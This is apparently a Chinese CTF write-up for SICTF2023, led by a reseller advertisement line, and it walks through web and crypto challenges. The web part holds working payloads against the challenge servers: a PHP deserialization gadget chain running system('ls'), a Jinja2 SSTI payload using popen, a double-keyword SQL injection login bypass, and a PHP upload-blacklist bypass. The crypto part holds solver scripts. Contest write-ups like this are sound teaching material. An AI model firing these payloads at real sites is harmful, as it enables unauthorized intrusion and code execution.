SICTF2023 WP
阿里云国内75折 回扣 微信号:monov8 |
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6 |
前言
新年前的最后一场比赛感谢shenghuo2师傅提供的misc和密码的wp把misc和密码ak了太强了
web
兔年大吉
源码
<?php
highlight_file(__FILE__);
error_reporting(0);
class Happy{
private $cmd;
private $content;
public function __construct($cmd, $content)
{
$this->cmd = $cmd;
$this->content = $content;
}
public function __call($name, $arguments)
{
call_user_func($this->cmd, $this->content);
}
public function __wakeup()
{
die("Wishes can be fulfilled");
}
}
class Nevv{
private $happiness;
public function __invoke()
{
return $this->happiness->check();
}
}
class Rabbit{
private $aspiration;
public function __set($name,$val){
return $this->aspiration->family;
}
}
class Year{
public $key;
public $rabbit;
public function __construct($key)
{
$this->key = $key;
}
public function firecrackers()
{
return $this->rabbit->wish = "allkill QAQ";
}
public function __get($name)
{
$name = $this->rabbit;
$name();
}
public function __destruct()
{
if ($this->key == "happy new year") {
$this->firecrackers();
}else{
print("Welcome 2023!!!!!");
}
}
}
if (isset($_GET['pop'])) {
$a = unserialize($_GET['pop']);
}else {
echo "过新年啊~过个吉祥年~";
}
我们要利用的是__call
方法的call_user_func
函数进入的话只有__wakeup()
和__destruct()
如果我们执行wakeup的话就会执行die()
退出了所以从__destruct()
进入进入if语句满足key == "happy new year"
执行firecrackers()
这个方法中会给不存在的属性wish
赋值可以触发Rabbit
中的__set
之后会return一个不存在的family
属性触发Year
中的__get
,之后会以调用方法的方式调用对象name
会触发Nevv
中的invoke
之后会调用不存的方法check()
触发__call
之后给cmd赋值就可以rce了
链子__destruct()–>__set()–>__get()–>invoke()–>__call()
poc
<?php
highlight_file(__FILE__);
error_reporting(0);
class Happy{
private $cmd;
private $content;
public function __construct($cmd, $content)
{
$this->cmd = $cmd;
$this->content = $content;
}
public function __call($name, $arguments)
{
echo "到达call" ;
call_user_func($this->cmd, $this->content);
}
public function __wakeup()
{
die("Wishes can be fulfilled");
}
}
class Nevv{
public $happiness;
public function __invoke()
{
echo "到达invoke" ;
return $this->happiness->check();
}
}
class Rabbit{
public $aspiration;
public function __set($name,$val){
echo "到达set";
return $this->aspiration->family;
}
}
class Year{
public $key;
public $rabbit;
public function __construct($key)
{
$this->key = $key;
}
public function firecrackers()
{
return $this->rabbit->wish = "allkill QAQ";
}
public function __get($name)
{
$name = $this->rabbit;
echo "到达get";
$name();
}
public function __destruct()
{
if ($this->key == "happy new year") {
$this->firecrackers();
}else{
print("Welcome 2023!!!!!");
}
}
}
$a = new Year('happy new year');
$a -> rabbit = new Rabbit();
$a -> rabbit -> aspiration = new Year('1');
$a -> rabbit -> aspiration -> rabbit = new Nevv();
$a -> rabbit -> aspiration -> rabbit -> happiness =new Happy('system','ls');
echo urlencode(serialize($a));
//O%3A4%3A%22Year%22%3A2%3A%7Bs%3A3%3A%22key%22%3Bs%3A14%3A%22happy+new+year%22%3Bs%3A6%3A%22rabbit%22%3BO%3A6%3A%22Rabbit%22%3A1%3A%7Bs%3A10%3A%22aspiration%22%3BO%3A4%3A%22Year%22%3A2%3A%7Bs%3A3%3A%22key%22%3Bs%3A1%3A%221%22%3Bs%3A6%3A%22rabbit%22%3BO%3A4%3A%22Nevv%22%3A1%3A%7Bs%3A9%3A%22happiness%22%3BO%3A5%3A%22Happy%22%3A2%3A%7Bs%3A10%3A%22%00Happy%00cmd%22%3Bs%3A6%3A%22system%22%3Bs%3A14%3A%22%00Happy%00content%22%3Bs%3A2%3A%22ls%22%3B%7D%7D%7D%7D%7D
注意要把Year
中的key赋值为happy new year之后因为有私有方法private
所以要url编码
ezbypass
源码
<?php
error_reporting(0);
highlight_file(__FILE__);
if (isset($_POST['code'])) {
$code = $_POST['code'];
if (strlen($code) <= 105){
if (is_string($code)) {
if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$code)){
eval($code);
} else {
echo "Hacked!";
}
} else {
echo "You need to pass in a string";
}
} else {
echo "long?";
}
}
这题和ctfshow举办的rce大挑战基本一模一样
直接看我的这个博客就可
https://blog.csdn.net/qq_63928796/article/details/127963079?spm=1001.2014.3001.5502
SSTI
f12看到参数是SI字典fuzz一下
242是被过滤掉的经过测试
可以通过拼接来绕过过滤构造payload就可以
?SI={%print(""['__cl''ass__']['__bas''es__'][0]['__subcla''sses__']()[132]['__in''it__']['__glo''bals__']['po''pen']('cat ../ga1f').read())%}
ezphp
题目是一个登录框有sql注入过滤了空格select用双写绕过
pass=1&user=-1'/**/ununionion/**/seselectlect/**/1'
成功登录admin页面
随便输一点可以看到源码
<?php
ini_set('open_basedir',".");
error_reporting(E_ALL^E_NOTICE^E_WARNING);
session_start();
if($_COOKIE['admin']!=md5('adminyyds')){
header('Location:/index.php');
exit();
}
echo('<h1>WelCome!ADMin!!!</h1>');
echo('this is a site test pages for admin! ');
if(isset($_POST['url'])){
echo file_get_contents($_POST['url']);
show_source(__FILE__);
}
else{
echo('<form action="/admin.php" method="POST">
url:<input value="" name="url" type="text">
</form>
');
}
//x9sd.php
?>
提示x9sd.php
去读取x9sd.php
post:url=x9sd.php
查看源码就可以看到x9sd.php的源码
class a {
protected $cmd;
function __destruct()
{ echo $this->cmd;
@eval($this->cmd);
}
}
if(isset($_GET['username']) && isset($_GET['unserx'])){
$var = base64_decode($_GET['unserx']);
if($_GET['username'] === "admin"){
echo "nonono?";
}
$username = urldecode($_GET['username']);
if($username === "admin"){
unserialize($var);
}
unserialize($var);
echo("success");
}else{
echo "I need some ???";
}
意思就是通过反序列化直接触发__destruct()
之后调用eval
函数进行rce还要绕过两个简单的if语句。
poc
<?php
error_reporting(0);
highlight_file(__FILE__);
class a {
public $cmd = "system('ls')";
function __destruct()
{ echo $this->cmd;
@eval($this->cmd);
}
}
$a = new a();
echo base64_encode(serialize($a));
//TzoxOiJhIjoxOntzOjM6ImNtZCI7czoxMjoic3lzdGVtKCdscycpIjt9
再吧admin经过两次url编码后传入username
username=%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65&unserx=TzoxOiJhIjoxOntzOjM6ImNtZCI7czoxMjoic3lzdGVtKCdscycpIjt9
ezupload
文件上传给了源码
<?php
@error_reporting(0);
date_default_timezone_set('America/Los_Angeles');
highlight_file(__FILE__);
if (isset($_POST['submit'])){
$file_name = trim($_FILES['upload_file']['name']);
$black = array(".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext);
if (!in_array($file_ext, $black)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = 'upload'.'/'.date("His").rand(114,514).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错';
}
}else {
$msg = '你传啥玩意';
}
}
if($is_upload){
echo '呀,传进去了欸~';
}
?>
主要是这一部分
if (!in_array($file_ext, $black)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = 'upload'.'/'.date("His").rand(114,514).$file_ext;
他把传入的文件放到了upload下的一个文件而文件名是由date("His")
传入的时间rand(114,514)
114到514的随机数再加上文件的后缀组成的而这个时间开头被定义成了美国时间
date_default_timezone_set('America/Los_Angeles');
这就是时间
再看这一串过滤
$black = array(".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
其实并没有过滤php所以直接上传php文件即可之后再记住上传的美国时间再bp中爆破rand(114,514)即可
CRYPTO
Ascii
import base64
flag = 'a$HVZDZQ@TJUMGLVHZIYUF1U0NNYDURWWDNM6FFYP1OA[TRPHWJZ7R>>>>$'
flag_ = ''
for i in flag:
flag_ += chr(ord(i)^3)
print(base64.b64decode(base64.b32decode(flag_[2:-1]).decode()).decode())
hashgame
MD5再MD5
为了只爆一次写了个ditc
from hashlib import md5
flag_md5 = '''999a215b1f8372bb0f1c84c467a1506b
02b0b94ee1fa195ae7959560893f7e3c
297e7ca127d2eef674c119331fe30dff
65c162f7c43612ba1bdf4d0f2912bbc0
ed8a4ab0c0967b14e3bf6b145e153ec9
d24412e1ab190533176a653cef11b185
815e6212def15fe76ed27cec7a393d59
38026ed22fc1a91d92b5d2ef93540f20
cd7fd1517e323f26c6f1b0b6b96e3b3d
a94837b18f8f43f29448b40a6e7386ba
dc0ae7e1387be9b795f5d6299e383759
815e6212def15fe76ed27cec7a393d59
38026ed22fc1a91d92b5d2ef93540f20
dc0ae7e1387be9b795f5d6299e383759
a3655d5c04849a174d341b13d5cf5468
28c8edde3d61a0411511d3b1866f0636
011ecee7d295c066ae68d4396215c3d0
d7afde3e7059cd0a0fe09eec4b0008cd
39abe4bca904bca5a11121955a2996bf
a3655d5c04849a174d341b13d5cf5468
011ecee7d295c066ae68d4396215c3d0
28c8edde3d61a0411511d3b1866f0636
38026ed22fc1a91d92b5d2ef93540f20
dc0ae7e1387be9b795f5d6299e383759
a3655d5c04849a174d341b13d5cf5468
4c0d13d3ad6cc317017872e51d01b238
83be264eb452fcf0a1c322f2c7cbf987
4e44f1ac85cd60e3caa56bfd4afb675e
815e6212def15fe76ed27cec7a393d59
a3655d5c04849a174d341b13d5cf5468
28c8edde3d61a0411511d3b1866f0636
4e44f1ac85cd60e3caa56bfd4afb675e
ed108f6919ebadc8e809f8b86ef40b05
a94837b18f8f43f29448b40a6e7386ba
dcfcd07e645d245babe887e5e2daa016
665f644e43731ff9db3d341da5c827e1
83be264eb452fcf0a1c322f2c7cbf987
39abe4bca904bca5a11121955a2996bf
39abe4bca904bca5a11121955a2996bf
4c0d13d3ad6cc317017872e51d01b238
dc0ae7e1387be9b795f5d6299e383759
011ecee7d295c066ae68d4396215c3d0
5eccf232f5ebb3e780543372692fff18'''.split('\n')
import string
md5_md5 = {}
for i in string.printable:
md5_md5.update({md5(str(md5(i.encode("utf-8")).hexdigest()).encode("utf-8")).hexdigest() : i})
flag =""
for i in flag_md5:
flag+=md5_md5.get(i)
print(flag)
# SICTF{13578a78-1bd1-483e-8c01-4d501c8b52bb}
baby_rsa
N是234个素数的积
factordb分解一下 处理数据
import libnum
c = 44457399775772165283580795763046604956432217865936749114390645714446263790235445725770165521476841968764175721036280702731933849090719866149354613431301887740671003826556620460836983488011711209908075106260857650574672356032244606425941095128801765463716482316101398637519304864271794460829068714740938719022156283319142938782439784724450045931039355442034325311037568791297455084676548879770834712506552233840348850684727096270392080049993135041218143811167688449496243036317450681348089315258831745988434134987055263393540923865029931594717328162951158311497514418799360413513590684301435386737514918075848373373755748782672860711406169316940293554209702288482064854840802876490202123903888235028119047988176327629542924415737212649237787748145773301112682790682933658516724691338727523894513267588035437093188599375494920656327919129240066252636130803666175859640361767805549884909317548802917210333235914904622641997249853362378711924024129399688535136879208010081166848163897114124726692078532337827810846421365846926064892472698603597461932481745017020417072013702099809833423003201003030492
n = 157077292656328898849823499976497003976795705913326943955927601882559735301000546878663484930436631929909115065166613744548816622146802007640124796249330573411377703969505934904150600987843325674764620305047603408490558134670867673308099650843329640744997672015466571290660161290811275435569339606335117906571999000341133024698424364682800683662193063661214736762852739324479859236963365531207752799197178993887860855078852702337761399225640575281412171035871278933493943575572155382899938265639764715616686123949482372238288859715465115400317136714757882965887595246507450491169518000205087415380208167764110920711042584766805992237919576823121108078407699912757901788925718859790257450499775129521327827653298451904392241906547672843110356658889638496906522290674659574024024440113632175010053065452660076447040937842478007881589334096496073556056726805396937630799201696246079227214272205462258357482722478243481697053301054600954126539848778226175296162997813416634702496577009409960503948474494741296663849482119365434792563324547643352816519125305335959420429699475765642610737903235960423173
e = 0x10001
process = ['32771','33023','33071','33149','33343','33521','33863','33911','34123','34159','34231','34421','34499','34589','35089','35381','35831','35879','35969','36131','36523','36677','36871','37039','37159','37493','37691^2','37781','37951^2','37967','38219^2','38639','38821','38917^2','39019^2','39157','39343','39371','39703','39779','40087^2','40459','40471','40693','40867','41039','41161','41257','41263','41281','41387','41399','41443','41603','41771','41809','41863','41887','41941','42359','42373','42839','42899','43151','43207','43313','43391^2','43573','43613','43987','44087','44111','44207','44249','44281','44417','44491','44563','45077','45247','45281','45377','45943','45959','46147','46219','46439','46559','46853','47111','47681','47777','47857','47911','48259','48437','48479','48497','48593','48947','49103','49177','49193','49199','49363','49663','50047','50147','50261','50359','50383','50539','50833','51001','51109^2','51437','51593','51749','51787','52201','52379','52453','52769','52879','52937^2','53147','53717','53731','53917','53987','53993','54217','54311','54347','54377','54437','54469','54833','55049^2','55147^2','55249','55259','55291^2','55381','55457','55541','55661','55793','55967','56131','56149','56359','56501','56843','57037','57047','57131','57139','57413^2','57487','57571','57637^2','57803','57853','58057','58099','58147','58427','58537','58543','58679','58963','58991','59159','59333','59377','59417^2','59539','59611','59723','59743','59833','59879','59929','60029','60413','60427','60509','60679','61211','61379','61403','61781','61861','61991','62039','62297','62467','62581','62617','62683','63073','63149','63277','63331','63439','63659','63799^2','63839','63929','64217^2','64433','64679','64781','65239','65293','65497']
n_primes = []
for a in process:
if len(a)==5:
n_primes.append(int(a)-1)
else:
n_primes.append(int(a[:5])-1)
n_primes.append(int(a[:5]))
phi_n = 1
for i in n_primes:
phi_n *= i
d = libnum.invmod(e,phi_n)
m = pow(c,d,n)
print(libnum.n2s(m))
# SICTF{13578a78-1bd1-483e-8c01-4d501c8b52bb}
PolyRSA
可以知道
p = k**5 + 9*k**4 - 20*k**3 + 17*k**5 - 144*k + 47527
q = k**6 - 8*k**3 + 30*k**3 - 149*k**2 - 14*k + 39293
n = p * q
算一下可以知道
n == 18*k^11 + 9*k^10 - 20*k^9 + 396*k^8 - 2628*k^7 + 45494*k^6 + 710128*k^5 + 350749*k^4 + 281190*k^3 - 7079507*k^2 - 6323570*k + 1867478411
由于 k = getRandomNBitInteger(64)
所以 k = libnum.nroot(n//18,11)
import libnum
n = 2931835714514227696649197851452018066969814603905505893064829694548691616628661422451386639398824072768907608195113790730392677411502544741840786734616614308622423513064577929715025601090611378413475093510051291
c = 1162375069210804266034094584942794481470301602122091344590668656120128936761168164673823514232328715217241524062023457713973727518007443604233760475552174214966591823835585191443465256735930086309706593996639864
k = libnum.nroot(n//18,11)
e = 0x10001
p = k**5 + 9*k**4 - 20*k**3 + 17*k**5 - 144*k + 47527
q = k**6 - 8*k**3 + 30*k**3 - 149*k**2 - 14*k + 39293
n = p*q
phi_n = (p-1)*(q-1)
d = libnum.invmod(e,phi_n)
m = pow(c, d ,n)
print(libnum.n2s(m))
RRRSSSAAA
hint是dp泄露先解hint
import libnum
import gmpy2
e= 65537
n= 154243858720978602820118866455277758287334223654318945323956633685668127012462551649034724900534326698546179107853501584676890290935304784613676008667655919749627682648852472398117930471389759979432279103098572267738634433626627146280660185675121614094399255782089060202532182667463993275434746386786808729553
dp= 414447829724187823397808703878958757693775250832414113550357728233230359464880433113636330432984183165483109337095394192757735932571515450285102727598243
c= 107353143319003715532284973064969905174389167949274067058206046773012002421251301189097709121034091973243342582216724329271495555062882075119176838856174054763892910473175610614629226628025470613930226188506099489500606701109022668507012376482339056160636468427364776216626364765166621843217027512464383836160
for i in range(1,65535):
p=(dp*e-1)//i+1
if n%p==0:
q=n//p
break
print(p)
print(q)
phi_n= (p-1)*(q-1)
d=gmpy2.invert(e,phi_n)
m=pow(c,d,n)
print(m)
hint=libnum.n2s(int(m)).decode()
print(hint)
得到 Alpha == 8
p = getPrime(512)
q = gen_num(p*alpha)
r = gen_num(q*alpha*2)
s = gen_num(r*alpha*4)
n = p**alpha * q**(alpha*2) * r**(alpha*4) * s**2
gen_num函数相当于nextPrime函数所以把n中的qrs近似替换为p来表示
n = p**8 * (p*8)**(16) * ((p*8)*16)**(32) * (((p*8)*16)*32)**2
n=127314748520905380391777855525586135065716774604121015664758778084648831235208544136462336*p^58
所以p近似等于 libnum.nroot((n0//root),58)
然后求一下上一个最近的素数
def prePrime(x):
while True:
x-=1
if isPrime(x):
break
return x
p = prePrime(libnum.nroot((n0//root),58))
然后按照原方法推算发现n正确
import gmpy2
import libnum
from Crypto.Util.number import *
def gen_num(x):
while True:
x+=1
if isPrime(x):
break
return x
def prePrime(x):
while True:
x-=1
if isPrime(x):
break
return x
n0 = 510598540378970007468346322989879190780475356832709189528874695730531468123747091318830966440138615736420891392158097533731041150162690662471483619765171875053776526546923686545162088172326434280369545887080098691661618888498451216122577703462656147845476260802989936275927468143618457014875124540773380472942489037761179303561650189545290190421786318533073909424735517884608967725919128200358535113829753453601297612782921831305721998858231417374167746154206561475003022801732102170674160043866579234096945753255309604584663823273990392197858273029361669185072049422597132579136784027822968387907216366150999438414498332890674564920800382005582891491049365978733797356415518435343495821039314228388769356638637099572998812062355774848959446125701462950655806332002764535951282449862140062574418031213788534096501985200284615865248974807525604893147298611402252296159828500266098282909607218395957805357667923653409828275804406466185333491486073920384298557332939701611488655278812282652143513835104674009767479927241052662403578967182673338296967573503287747778401579267126898937724971226916836862238412923209155792382534204896050548824028658237640251964366961727999178646613907934616655737902329568420682808750546571786374023614255135110482419627491157502417864563832543812083026753673687664854910877686333766643694031564516722983669199704788291656757271915091399977189663329054202997146978631991467923388119989473941572476162990901960011968892272676827771256008656450296183884491251752111424531449198118292179798490440493223653950102915889401116251591885909790869073018774674246846164536910633015902964911907187085243240032540938841961345835517368130042501382327926289017383981908729734129193302049155793436988510517701765733605569135643208447952662352778482137713239592896997102366230279153456455232519301534222340901671138239539845240151878610363390683459663471954623868659324304077587611084188341121303918876492043578883059738615210439439368338460631574255417822627815523601923537626576677004085017875860928802762176477815284840936951142176532768517728636562256240668409525184886142801802825451465440993457022771077957094228957592122319682216294509338262739872163482972508991702525289361105971574659126127296233247905505496525683817711366704746617027744889413904684867577081667137187623825349410229389484199608739864221035985277681307389939848405790294473878622092200837753161101695539947514614727699952200114544362051873938505591469240465379091377837297561323297393518152524513948294475770774872596601345526469590486037386767964812631618224527233850818909346007449756779707319609915127618828551910681421647307180399632857248867655836894968134457622987954781685664833951774981383914013420724637676787907498490619865488706542422141338754933476190313653530739822029700217857534243473680585150263523947891501341441371965435851479670882202992955935279933652356336270251591324623898094984119190752775236005057405257945038031382867511822173122001309505728526596893926445291712035117553637589190292816001770554129840326832888707541999454791653742647879694585329112697382151447923691770809327807665376014114552626285289291808032845544905356380497227622738746307685611140483875177839511922977657045680353723672792411661489242162646272105649970359134277499907207906149573299990033858943215801954126448693460102775418225293255402758159431943811872373682053160944887775375465971432320964554947377318554518275854303099420999992690990916801757184853847474379621177976926681977371922191722085164910430032177320954341986984523594583172470609743970245810969858512632597943721628165724329447516823159387734220282510185959768239630017162115072758419177056571781075148374822721899683720488356041096248563880547752710289151512607087038310649235610688255059182467964379544134070766646863815775576049106337955345150055151813028534690066771104188418296440067303355417210829440978858599306487361626723932883675404705319649877631289465547597225908934420304867048341698308940436377375588905463549199568800788130324653074398891097223958392703515180958466771395566567923630440881986781120062769327993137151783189811570714391264155060840731029466593405853721833971303821804104382800673631786729744779165371433211267361024896576031556979771007693215198547296582235167582106419779580693225211695215406540025468141235241168387527901851774993867055740692835931115312659500713701652905802357951993290979099170159167009106534001226859533836082801229997337966972579186548771169099646656172882424089451273021293821026173210665095782802709874946641962115525841325300318524665386511421662860490620819561338110623774842340380068922415609137358448899126553279894950604871889208579886778999174405582160576479554324208876082033912031737086248121899303730781498156597249803927142235444644481388064486155431912003641095674949903404176810866307571531389637794147871012904134653569388493652441432759092336752228939764110397029831387803943394811558386122839568158928461007578259968765727092577006588264867960486472014493774664081407186721351852883527145790575242285664659303948842228766554243966691396492391152581830022133814454196259968655735361775914705332258892954614272244452518449260489348504449204461418971768011384340273291232094176572232837038670467853897665877851434992557429017504229337778470080893449423405491607587635438331476572996201482633587271479001915768182336813417460145272910780420062773057289352127058606048428315185624554551172152106354445240590380140756355226376829443068190672329776832112173322011137862590548721676059398379694994522794474774534579546109677615257696703950497332824299576069196330271666459758430542051969093680846765661685489556479825015505460585577388300005030240514448617715276600874290664416888184557142542207029827016362686924883704397874129412267949416733492080843315519912943048041880665442664534980370689081266908497051077237188221752059058912835617635691061804481035908317765279937217591432632832678806430381325340000898958680468694182993189208039459712391492410123386884340504648296815916980264240229859574883155040793388439699245314010536014311134726579595932201351264754211113984594974123575279085420654342347792446273359397655783349850267895960713020361459104930811498666622216299579774939159380045958811891996366190154624989040001455252320159516822116133341010157165599727635333348456688307169980804760876207246783116588952529877373514768545007418968307885769960168050996962066803264260375707466369627458024513973771207018864983698407016663019106354023164759250846073414341438963394719456500998324900154652118420207057668806120330181700845296117532235012372135050553397046174401449323031309344766628888675704109715329046692002106076405553528413866402862565543443907259825033515101841485790388106868972724754988229771779715569516295419556055234476868558577442887306482605945053829666543946452255290321024138948999088611233226734197091325915223296133751626031378197131875533631358612215053149934608672729194446883476706267066475008836864936670808320239466055935088929279252129128009704233352664523535820092988950793050907265677092793104426094212209504897403359406325045852228354350509453013015487815230129380079713113632363881496974185547766115624580099624722897692297760495094913178120692467666707678647081180656345151015995338390986674404981831649353833607305738823436744297628382797810952028446046016233612873716789383675779820186248250486000672269630344269347652027789034023080859790238772676504723029078903218723114249502157501775936110552413022658586833869562215506206204712447588632398550497708640229614956652263449460598992811393334042395804931240940416629178335447861485028284981615219874331354750385150254017244750993573994159458909546341067039268159319391512934162794663414200907868505060542602841564239761181077333990423542820064315891665379550720216448942932714180923613869070005330476506812100063599659432570925437054287120906048730323556681557905787470647037629769660028387819741611799183349496549168370221978146678987457271259655273299546276899538032070218474555442304430064164467753804089753466882786069297036926063093020795423414152340563079346797084488827259011515774643776620378827875819192074121522712821147817374988804339999134520633699074448564057555026364304855373068414955699295158212425760345481057281658337956841137897162198027254556350868502178340964817530029135654659162400076087528650997151875596189190736466304722028587441680622878918057024286243448077104494316372739218635221411755498456912672491099154558604384574583302548226057069534004474532514444674565766058970748694657151540644416463532338966570743112669782840065402131461088637463019996192189423665651801811614499041923273110971446683450048861113332787126098622974613883291506736280588039145040361795192519576202306796277888696719887642051327259799873478040156450250036778305950744573270786882726162630115640020293415918210448873867037875790399234972055537649774407094382744621251926131880807765203843946682834221238903263352845265134368550124026502981782369374484091775137498831749984649699756860976525160646445060537001
c = 25311588269686177955448734593829241225577179988164713941852977611031657483354358211703127234256857543045931490595235462694154500286504335321863566904591526587164297277540588019404183750093303030110155964308233155625979213391426577001127732161793532171930032372311485789800839135378584125843945003217786635500780784536181313697728354510921343049319891609423580951127082479154042124088536642353812516362473763243425336498681024731131013712158320926550826023277898283823992258572884077276506953901984370413493389421701244517177275694290580595883324705204426546600360091062972293159479880268240701929584137714053692704173792703744319619320692061092061615202753943135058204637610994232168818081462863915909261100211958674543647005416235222620606212841753586419836448681445654681389951211124603287962397164672343026391101395393442103086256726266031275710666309840451443110824175976964355109239201609721120961810198879456321855222352235065257082872600438604687617267718725588993464084147695037610145634237788526691386358596867368523164061114195245860062033244276270480267737617206612775486335779851309426638789250166900931784751600508190450785806340839297468432626354823268011108399699249876358363866293469899572158837757748629586492339783888456600259136387616777593894789302431752391447333278000811521062096467397501227651566498970779080811188805992370970942403208432494393387894197176720244315639559895616799551357601688597541585709039366190088117378880414928532937085490713336140523926983900188378021593225550131993528275166272215028510435690944582596557549068715312515919059333916941744937308255671959764859162487792658274812322891679161915480098864709106347357292015949882243095564999283630289876842913558415205967734452657944991350268108202225952952066459093168792825684626405271617613362070897142103054139806566495183172335794957308822648116537830567396971238329939142829563169355194093529211071160078683833491919940022871862059981346961003867620542620578917684687869682550269127226291011607064545739386850054846167307744022708831833252517778607796258598290908139274345221343651583618249287308738279011682960787460189183445095638164116734700624496711487227176740828397696295620232796356005136058517828311139839381424066302086111930635998143063033446131859852797958765199173807715541045956108285596958780742834805533223538366354327087736088500599094358107164689423572964793385788194218918919596478862097292477628426360333874314260108133339375942666508606311391805252966277961758108821946154428477616100004321457604879220523742427633323872953699931521980332026241531049474031438142792394628576016121322036294740176980189940853036679375845577017978783071015970829136676221389585848058189544793760570196797629432282672371000290840492119720433350192833648839794730598188620374416865232426658538841900897108162173580739323675324880778494924038982358349531848197090990541020708295116156624389135273650491811601011636903928586011504526431498652011548693157985029456398851189821020778958527809174433156243544030624341915713810661287037659586018768085470670240790942171506843637271442721823608266490364627429331023698199955218456371716269004979764982383921294842864121196124699402037204598504310969390789092001114319822852242500941141355281693725110460506548426263105213498404197519606615831672853931646583757742145492562101250546593997874586076926641241047317510838024042147508770595175718146175716833867781581245298658392175502069483979736336330731124942036757071709086638075284655589787868565023763734664219353940143820183318534640360506287779208468427268377183973501528333749816003855834863565394122448191029578528511650194632623989208637401008114422451686312319644054514944700566430912835340518601698767128195833704182657730566589247891277627101027106635732998136735398078858899384713118593668984773592904704131402905145754570091966901120411201405256435232063295790833161132002246279663161388421997242226907126829858922174709653627696146355472690262198127338971112610753839661677080463775112411884196230185877234066728564716929551607129141735155379529048300204700285511666205204686244751557147684338591300111406075976759988295937870045743031816067994768915303111125253664865369863586807234945352445045026501495849671447691502253489642657652848949102823407762108943161789244134119866441040670840037015617307056821150285453994199024947457774647253618512995677313792036106100497936654142008173389260345411854520383366800831542339243757421033121103167943520915885043698882609693007629591093225819727653240183003450339802857059736870645197609170799838610316307123146927966669912638227587517396282910946355194781275415343491170583392480153599086125374051844306869510079152461763122622668280249192047024784624692776244265874153473114993619019113474166958126841368545758693832786756946298833891033171752534079387364641021835311861509609494125593285947444939996542402774020507531158198766149282993994638607458820211163623309687149807339960007614766879688676462400606899851539023671152038536934433128973358637812907001112093086713949701646964777013925616637956114825918525229968119306607256312727518429074253193934915609865400118400124334806320033990630595454381780378123232633134565408152216410478497582716891919477755736223636583493709691482948793995974775520709337409910573358960632077245564017495103173982250506224927848890977671698731337737945862469303397352291579706358090437359126171980555387033997507170208063868788685780633727495158542911276981383764698030088894904043298340184342818716278091407356551940358010532738356144600648671870141201656260882560550096111259047730234565173017875969390130055742832375612379167064701421263006004472414998830886590121784525812803198481744263349186310137594023961272959521982892804372412802448375074058059953851751721276448647238818757245128139844126234490887064897176175605991477364838775902549049484485649550475857257115219540606931472558004890564503134870490140656624241401747198540715275804941032074573356860460172868340373583692584902872979221114982298050586685719887060873413850621645519128954022253850929825608263273096476942591333367968509790925478388960974334157155990587259664085903377635645971389261554405014491809856113962072321115329323751880850245450855429733690986687462514539793256111238991830404264833945950057548041347552265351912075406068254301589527368376552057750656888595867048015012255350060023438752477068307445956245683183096512267217891149812719686622381240260466772552889788641876064057960173837664029586196731436456574414559972320705400861271592462379875676277251086312872195716024719468847393778892154498344296554136868868732950910162390521996660833516010868267341539744299603050842530651780425947531816479566426165422123252285427076862067553260240357395991463485011778125635347076641337205162163658915958257879189951068432591492287483129944125287963913713736174143726754563437013760958618334477377727596918588685928884428267449422751775309153821164066157157127578931430789782791432466972743083256930846560916380022935439074194208587413499830348721004306047843916090382879427208653946874404416581482497419737465638158237340330822703573665318917667360471294611610224794247546701801044290825387969994925735165223021550294577211312086169077389985367351707099712483698243658870007261177946508698830792080087400145468466457013023648585707831661968993789151545051681008263293021078693138432668411562842904645661356499891588207831214182852485507569391094080770281546830762172075737108196782354642073491890672014845707320966391491467609280627047834838773416130380735074488364271149543425149101272213833983451690912775914099688310078028317868139895586469648241691434390559738020665790535748911667198341478329818172050103593169144077713081858968945277802911631514524770516773987691162846774892828407010262766598402873965272708201519043339930474621748065360132998861911090097210247744181877811558047691563490093112810880988416880859363631693862441291401344868362517958157134815632633152101164792211199872770004214575342556751954753067436057216989105115974894826691301734658752554796336087163153087013755182247902851847839867807219615044427616326518986674768302109569955218389569458769985874451273117138435546665024826358058600551523916808015505037962468350942106702503883112975634757971636535249998962164886704286732345711210362931312187319836001555348202695806282730945501510756659164231139623277954192087899140537284122009070763979073048837471984618684020674370221463294306239424220412900401460550783283591789801735401367473630854684306273273881688896021682911944793729874921181848098382943970467341811398482121657330781393699096796050290808604481724879698091852697163383826854575487201365106673196811573729247280577781500366763330567122007588833805912087009446499739562463428568952248234506507069953596589309728265145195922268165106056450388840269349409588020300011340940321969965833519126936472969929255823540027083032424724503173052044192907375974391257436211908641463947719594493311129179150043015816776680636855703407557636501711566215605658114055289137679940955
e = 19458216662993202562182929756256684791318810848802754020883513588583377528821730559897870095442161189229950925325157413999927847684731484753811988111830295294129447423655650029218971567158117911790213848402209470536199246476182240248742771389082526603384625792117047996128232952372477895218147279573573322975526303267821446640338606290250958710008158544852602338088244940388562828263436457418528981476220691508040085291576643321726669065360399003917048894093458055139757991688086912143763420958307099065105543361779847689716282373299487102518794317683805758527645283956734672229827240143254092779918701447288342107763
alpha = 8
root = 127314748520905380391777855525586135065716774604121015664758778084648831235208544136462336
p = prePrime(libnum.nroot((n0//root),58))
print()
q = gen_num(p*alpha)
r = gen_num(q*alpha*2)
s = gen_num(r*alpha*4)
n = p**alpha * q**(alpha*2) * r**(alpha*4) * s**2
